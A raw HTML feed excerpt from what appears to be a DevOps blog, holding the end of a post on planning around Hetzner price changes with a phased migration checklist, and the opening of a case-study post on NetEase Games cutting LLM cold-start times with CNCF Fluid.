          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-decide-by-workload-class"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Do not make one global decision for everything on Hetzner.</p>
<h3 id="h3-stable-dedicated-servers" class="group relative scroll-mt-24">
        <a href="#h3-stable-dedicated-servers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Stable dedicated servers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-stable-dedicated-servers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If an existing dedicated server is stable, well-utilized, and hard to move, staying put may be the best decision. The announcement says currently rented servers are not affected by this adjustment.</p>
<p>For these systems, do the boring work:</p>
<ul>
<li>Confirm the current billing terms.</li>
<li>Record the hardware specs and replacement plan.</li>
<li>Verify backups with a restore test.</li>
<li>Keep a migration runbook current even if you do not plan to use it.</li>
</ul>
<h3 id="h3-frequently-resized-cloud-workloads" class="group relative scroll-mt-24">
        <a href="#h3-frequently-resized-cloud-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Frequently resized cloud workloads
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-frequently-resized-cloud-workloads"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>These deserve the closest review. If your workload adds capacity often, the &quot;new orders and rescales&quot; language matters.</p>
<p>Model total workload cost, not just VM price:</p>
<pre><code class="hljs language-text">Monthly workload cost =
  compute
+ block storage
+ snapshots
+ backups
+ load balancers
+ bandwidth overages
+ support
+ engineering time
</code></pre><p>The cheapest VM is not always the cheapest workload. If a provider saves $40/month but adds three hours of operational work every month, it is not cheaper for a real team.</p>
<h3 id="h3-low-risk-disposable-workloads" class="group relative scroll-mt-24">
        <a href="#h3-low-risk-disposable-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Low-risk disposable workloads
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-low-risk-disposable-workloads"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If you want to reduce provider concentration, start here:</p>
<ul>
<li>CI runners</li>
<li>Preview environments</li>
<li>Batch workers</li>
<li>Staging apps</li>
<li>Stateless internal tools</li>
</ul>
<p>These systems are useful migration drills. They reveal missing Terraform modules, secrets assumptions, DNS gaps, and observability gaps without putting your primary database at risk.</p>
<h2 id="h2-keep-one-simple-fallback-ready" class="group relative scroll-mt-24">
        <a href="#h2-keep-one-simple-fallback-ready" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Keep One Simple Fallback Ready
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-keep-one-simple-fallback-ready"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>For smaller teams, it helps to keep one boring fallback provider ready. DigitalOcean is a reasonable candidate for this role. It is not a perfect replacement for Hetzner dedicated servers, but it is easy to price, easy to explain, and good enough for many web apps, staging environments, internal tools, and smaller production services.</p>
<p>DigitalOcean&#39;s <a href="https://www.digitalocean.com/pricing/droplets">Droplet pricing</a> currently starts at $4/month for basic VMs, and the pricing page says Droplets use per-second billing with a monthly cap. That kind of predictable pricing is useful when your goal is optionality, not chasing the absolute lowest benchmark score.</p>
<p>Use any fallback provider as a test target first:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">provider:</span> <span class="hljs-string">digitalocean</span>
<span class="hljs-attr">candidate_workloads:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ci-runners</span>
    <span class="hljs-attr">reason:</span> <span class="hljs-string">stateless</span> <span class="hljs-string">and</span> <span class="hljs-string">easy</span> <span class="hljs-string">to</span> <span class="hljs-string">recreate</span>
    <span class="hljs-attr">rollback:</span> <span class="hljs-string">disable</span> <span class="hljs-string">new</span> <span class="hljs-string">runners</span> <span class="hljs-string">and</span> <span class="hljs-string">re-enable</span> <span class="hljs-string">Hetzner</span> <span class="hljs-string">runners</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">staging-api</span>
    <span class="hljs-attr">reason:</span> <span class="hljs-string">low</span> <span class="hljs-string">traffic</span> <span class="hljs-string">with</span> <span class="hljs-string">simple</span> <span class="hljs-string">DNS</span> <span class="hljs-string">rollback</span>
    <span class="hljs-attr">rollback:</span> <span class="hljs-string">point</span> <span class="hljs-string">staging</span> <span class="hljs-string">DNS</span> <span class="hljs-string">back</span> <span class="hljs-string">to</span> <span class="hljs-string">Hetzner</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">internal-dashboard</span>
    <span class="hljs-attr">reason:</span> <span class="hljs-string">low</span> <span class="hljs-string">customer</span> <span class="hljs-string">impact</span> <span class="hljs-string">and</span> <span class="hljs-string">simple</span> <span class="hljs-string">data</span> <span class="hljs-string">model</span>
    <span class="hljs-attr">rollback:</span> <span class="hljs-string">restore</span> <span class="hljs-string">previous</span> <span class="hljs-string">deployment</span> <span class="hljs-string">target</span>
</code></pre><p>The goal is not to move everything. The goal is to make sure your team has a path if the final prices change the math.</p>
<h2 id="h2-migration-checklist" class="group relative scroll-mt-24">
        <a href="#h2-migration-checklist" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Migration Checklist
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-migration-checklist"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If the June 15 prices push you toward migration, move in phases.</p>
<h3 id="h3-phase-1-classify-systems" class="group relative scroll-mt-24">
        <a href="#h3-phase-1-classify-systems" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 1: Classify systems
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-phase-1-classify-systems"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><pre><code class="hljs language-text">Class A: stateful production systems, high migration risk
Class B: stateless production services, medium migration risk
Class C: staging, CI, batch, internal tools, low migration risk
</code></pre><p>Move Class C first. Leave Class A alone until restore tests, load tests, and rollback steps are proven.</p>
<h3 id="h3-phase-2-prove-backups" class="group relative scroll-mt-24">
        <a href="#h3-phase-2-prove-backups" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 2: Prove backups
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-phase-2-prove-backups"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>For PostgreSQL, do not stop at &quot;backup job succeeded.&quot; Restore it:</p>
<pre><code class="hljs language-bash">pg_dump --format=custom --file=prod.dump <span class="hljs-string">&quot;<span class="hljs-variable">$DATABASE_URL</span>&quot;</span>
createdb restore_test
pg_restore --dbname=restore_test --clean --if-exists prod.dump
psql restore_test -c <span class="hljs-string">&quot;select count(*) from users;&quot;</span>
</code></pre><p>For object storage, test reads from the restored copy:</p>
<pre><code class="hljs language-bash">aws s3 <span class="hljs-built_in">sync</span> s3://current-bucket ./restore-check \
  --endpoint-url <span class="hljs-string">&quot;<span class="hljs-variable">$CURRENT_S3_ENDPOINT</span>&quot;</span>

find ./restore-check -<span class="hljs-built_in">type</span> f | <span class="hljs-built_in">head</span>
</code></pre><h3 id="h3-phase-3-lower-dns-ttls-early" class="group relative scroll-mt-24">
        <a href="#h3-phase-3-lower-dns-ttls-early" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 3: Lower DNS TTLs early
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-phase-3-lower-dns-ttls-early"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Set lower TTLs before the cutover window:</p>
<pre><code class="hljs language-text">api.example.com. 300 IN A 203.0.113.10
</code></pre><p>Do this before you need it. A five-minute TTL does not help if resolvers cached yesterday&#39;s one-day TTL.</p>
<h3 id="h3-phase-4-move-stateless-services-before-databases" class="group relative scroll-mt-24">
        <a href="#h3-phase-4-move-stateless-services-before-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 4: Move stateless services before databases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-phase-4-move-stateless-services-before-databases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Move app instances first when possible. Keep the database in place, connect across providers temporarily, and measure latency. That gives you a safer rollback path than moving compute and data at the same time.</p>
<h3 id="h3-phase-5-move-state-last" class="group relative scroll-mt-24">
        <a href="#h3-phase-5-move-state-last" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Phase 5: Move state last
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-phase-5-move-state-last"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Only move databases after you have:</p>
<ul>
<li>A recent restore test</li>
<li>A write-freeze or replication plan</li>
<li>A rollback point</li>
<li>Application-level health checks</li>
<li>A clear error-budget agreement</li>
</ul>
<h2 id="h2-when-staying-is-the-right-call" class="group relative scroll-mt-24">
        <a href="#h2-when-staying-is-the-right-call" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          When Staying Is the Right Call
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-when-staying-is-the-right-call"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Staying with Hetzner may still be the best answer.</p>
<p>Stay if:</p>
<ul>
<li>Your existing contracts are not affected and the workload is stable.</li>
<li>The workload uses dedicated hardware efficiently.</li>
<li>Migration risk is higher than likely savings.</li>
<li>You depend on Hetzner-specific networking, locations, or workflows.</li>
<li>Your team does not have time to validate another provider properly.</li>
</ul>
<p>FinOps is not &quot;move providers whenever prices change.&quot; It is knowing which assumptions changed and which ones did not.</p>
<h2 id="h2-what-to-watch-on-june-15" class="group relative scroll-mt-24">
        <a href="#h2-what-to-watch-on-june-15" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to Watch on June 15
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-to-watch-on-june-15"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>When Hetzner publishes the final prices, check:</p>
<ul>
<li>Cloud plan prices by region</li>
<li>Dedicated server monthly prices under the new <code>-1</code>, <code>-2</code>, <code>-3</code>, and <code>-1-Ltd</code> structure</li>
<li>Setup fee reductions versus monthly increases</li>
<li>Rescale behavior for existing cloud servers</li>
<li>Whether limited products affect capacity planning</li>
<li>Differences between Germany, Finland, Singapore, and US locations</li>
</ul>
<p>Then update the exposure report with real numbers.</p>
<h2 id="h2-bottom-line" class="group relative scroll-mt-24">
        <a href="#h2-bottom-line" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bottom Line
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-bottom-line"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Hetzner&#39;s latest announcement is not automatically a migration trigger. It is a planning trigger.</p>
<p>If your fleet is stable, you may only need to document terms and wait for the final price table. If your workloads resize often, run close to margin, or depend on cheap disposable capacity, model the impact now.</p>
<p>The practical response is simple: know what is exposed, prove your backups, test one fallback path, and avoid making a rushed provider decision on June 15.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[How NetEase Games Cut LLM Cold Starts From 42 Minutes to 30 Seconds Using Fluid]]></title>
      <link>https://devops-daily.com/posts/netease-fluid-30-second-llm-cold-starts-kubernetes</link>
      <description><![CDATA[NetEase Games published a Kubernetes case study walking through how they took their serverless GPU inference cold-start time from 42 minutes down to under 30 seconds. The bottleneck isn't the GPU. It's the 60GB model weights crossing a region. Here is what they did with the CNCF Fluid project and how to apply the same pattern even if you are not on Kubernetes.]]></description>
      <pubDate>Tue, 26 May 2026 11:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/netease-fluid-30-second-llm-cold-starts-kubernetes</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Kubernetes]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[AI]]></category><category><![CDATA[GPU]]></category><category><![CDATA[CNCF]]></category>
      <content:encoded><![CDATA[<p>NetEase Games published a case study on the CNCF blog last week walking through how they took serverless LLM inference cold-start times from a wince-inducing 42 minutes down to roughly 30 seconds. The framing line in the post is the one worth taping above your desk: <strong>&quot;elastic compute is only useful if data can move just as fast.&quot;</strong> If you run inference workloads on Kubernetes and you have ever waited for a model to &quot;warm up&quot; on a fresh pod, you have hit this wall.</p>
<p>The interesting thing about the case study isn&#39;t the headline 84x speedup. It&#39;s the staircase. They publish four numbers, each a different architecture, each a meaningful intermediate stop. The path looks like this:</p>
<pre><code class="hljs language-text">Cross-region direct access from S3-like storage    : 42 minutes
Traditional cache layer (raw Alluxio)              : 14 minutes
Fluid-based prefetching                            :  3 minutes
Production-tuned Fluid with proactive warmup       : 30 seconds (sometimes under)
</code></pre><p>Each step is a different bet about where the bottleneck actually is. This post walks through the bets, why they paid off, and what patterns transfer to your stack if you are not running NetEase&#39;s exact architecture.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A modern LLM serving pod has to pull tens of GB of model weights before it can answer a single request. That pull is the cold-start. The GPU is sitting idle the whole time.</li>
<li>Direct pulls from object storage across a region are bandwidth-and-latency bound. 42 minutes is what you get if you assume cloud-native means &quot;let the storage layer handle it.&quot;</li>
<li>A naive Alluxio cache in front of the storage cuts 3x. A naive cache is not enough.</li>
<li>Fluid is a CNCF project (incubating) that wraps Alluxio (or JindoCache, or JuiceFS) with a dataset CRD, scheduled prefetch workflows, and CSI/sidecar injection. The wrapper is the value, not the cache.</li>
<li>The last 10x came from proactive warmup, treating the dataset as a workload to schedule rather than a side concern.</li>
<li>You can apply most of this pattern without Fluid if you are not on Kubernetes. The principles are: place the cache on the inference node, warm the cache before the pod starts, and treat model weights as a first-class artifact, not a runtime dependency.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A workload where cold-start matters. Production inference, autoscaling LLM endpoints, serverless GPU jobs.</li>
<li>Models in the 10-100GB range. The numbers below scale linearly with weight size.</li>
<li>Familiarity with Kubernetes manifests and PV/PVC if you want to apply Fluid directly. The principles section at the end is K8s-agnostic.</li>
</ul>
<h2 id="h2-why-the-cold-start-is-42-minutes-in-the-first-place" class="group relative scroll-mt-24">
        <a href="#h2-why-the-cold-start-is-42-minutes-in-the-first-place" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why the cold start is 42 minutes in the first place
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-the-cold-start-is-42-minutes-in-the-first-place"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A serverless LLM endpoint goes through this on every scale-up:</p>
<ol>
<li>Scheduler places a pod on a node with a free GPU.</li>
<li>Container image pulls (a few GB if you&#39;re disciplined, 20+ GB if you&#39;ve bundled CUDA libraries badly).</li>
<li>The container starts, the runtime initializes, and the model loading code tries to open the weights.</li>
<li>The weights are not on the local disk. They are in S3, GCS, or an internal object store, maybe in a different region from the GPU node.</li>
<li>The model loader streams 30-60 GB across that network link, decodes the shards, and copies them into GPU memory.</li>
<li>First request can finally be served.</li>
</ol>
<p>The cross-region throughput on cloud object storage is realistically 200-400 MB/s sustained from a single client. A 60 GB model at 300 MB/s is 3.5 minutes if everything goes perfectly. In practice, you also get retries, redirect overhead, multi-shard sequential reads, and the model loader doing extra work (verifying checksums, building a tokenizer&#39;s vocab, allocating GPU memory in chunks). 42 minutes is the realistic worst case when the model is on the other side of a continent and nobody has thought about warming a cache.</p>
<h2 id="h2-bet-1-put-a-cache-layer-in-front-of-object-storage" class="group relative scroll-mt-24">
        <a href="#h2-bet-1-put-a-cache-layer-in-front-of-object-storage" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bet 1: put a cache layer in front of object storage
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-bet-1-put-a-cache-layer-in-front-of-object-storage"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Step one is the textbook fix. Put <a href="https://www.alluxio.io/">Alluxio</a> (or any distributed cache) in front of your object store. The first pod that wants a model pulls it once, subsequent pods on the cluster get it from the local cache cluster instead of crossing the region.</p>
<p>NetEase measured this at 14 minutes. Still painful, but 3x better. The reason a raw Alluxio cluster doesn&#39;t get you all the way to 30 seconds is the cache doesn&#39;t know which models to warm. If the first cold-start of the day is what triggers the cache fill, the first user still waits 42 minutes. Every subsequent pod for the same model is fast, but the moment you autoscale to a new model variant or your fleet horizontally scales, you&#39;re back at step one.</p>
<p>The conclusion the team arrived at is the same conclusion every serious LLM inference platform reaches: <strong>caches that are passive are not good enough.</strong> You have to know what you&#39;re going to need and start moving it ahead of time.</p>
<h2 id="h2-bet-2-fluid-as-the-dataset-crd-on-top-of-the-cache" class="group relative scroll-mt-24">
        <a href="#h2-bet-2-fluid-as-the-dataset-crd-on-top-of-the-cache" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bet 2: Fluid as the dataset CRD on top of the cache
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-bet-2-fluid-as-the-dataset-crd-on-top-of-the-cache"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
